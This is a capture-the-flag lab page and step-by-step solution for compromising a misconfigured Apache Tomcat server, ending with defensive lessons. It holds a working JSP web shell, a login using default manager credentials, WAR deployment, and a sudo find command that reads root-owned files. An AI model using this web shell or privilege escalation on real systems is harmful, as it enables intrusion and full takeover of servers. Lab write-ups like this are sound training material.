Avatar

Labs / Compromised 1

  • Medium
  • Released 11 Nov 2024

🔥 Can you compromise this misconfigured Tomcat server?

Dive into a realistic web application penetration testing scenario featuring Apache Tomcat. This server has been left with dangerous default configurations and sudo misconfigurations that could lead to complete system compromise. 🎯 Master the art of web application exploitation, WAR file deployment, and Linux privilege escalation in this hands-on challenge.

2
Flags
40
Points
Medium
Solution Available
Free Access
Start Lab Environment

Launch your dedicated AWS machine to begin hacking

~1-2 min setup
AWS dedicated
Private instance
Industry standard
Medium

Compromised 1 - Complete Solution Walkthrough

Step 1: Web Application Reconnaissance

  1. Start by scanning the target to identify open ports:
nmap -sS -sV -Pn <target-ip>
  1. The scan reveals that ports 80 (HTTP) and 8080 (Apache Tomcat) are open
  2. Navigate to the Tomcat web application:
http://<target-ip>:8080

Step 2: Tomcat Manager Access

  1. Look for the Tomcat Manager application:
http://<target-ip>:8080/manager/html
  1. Try common default credentials:
  2. Username: admin
  3. Password: admin
  4. Successfully access the Tomcat Manager interface

Step 3: WAR File Deployment

  1. Create a simple JSP web shell (note: reverse shells won't work as outbound traffic is blocked):
mkdir webshell
cd webshell
echo '<%@ page import="java.io.*" %><% String cmd = request.getParameter("cmd"); if(cmd != null) { Process p = Runtime.getRuntime().exec(cmd); BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while((line = reader.readLine()) != null) { out.println(line + "<br/>"); } } %>' > shell.jsp
jar -cvf ../shell.war *
cd ..
  1. Deploy the WAR file through the Tomcat Manager interface
  2. Access your deployed web shell:
http://<target-ip>:8080/shell/shell.jsp?cmd=whoami

Step 4: Initial System Access

  1. Verify you have command execution as the 'hacker' user:
http://<target-ip>:8080/shell/shell.jsp?cmd=id
  1. Retrieve the user flag:
http://<target-ip>:8080/shell/shell.jsp?cmd=cat /home/flag-user.txt

Step 5: Privilege Escalation Enumeration

  1. Check sudo privileges for the current user:
http://<target-ip>:8080/shell/shell.jsp?cmd=sudo -l
  1. The output shows that the hacker user can run /usr/bin/find as root without a password

Step 6: Root Flag Retrieval

  1. With root privileges, retrieve the root flag:
http://<target-ip>:8080/shell/shell.jsp?cmd=sudo%20find%20/root%20-name%20flag-root.txt%20-exec%20cat%20%7B%7D%20%2B
  1. You now have both user and root flags, completing the challenge

Security Implications and Lessons Learned

  • Default Credentials: Using default credentials like admin/admin makes web applications vulnerable to unauthorized access
  • Tomcat Manager Exposure: Exposing the Tomcat Manager interface without proper access controls allows attackers to deploy malicious applications
  • Sudo Misconfigurations: Granting sudo access to powerful binaries like find can lead to privilege escalation
  • Defense: Change default credentials, restrict manager access, and carefully configure sudo permissions

Tools and Techniques Summary

  • nmap: Network reconnaissance and port scanning
  • JSP web shells: Custom web shell creation for command execution
  • Tomcat Manager: Web application deployment interface
  • find binary: Exploiting sudo misconfigurations for privilege escalation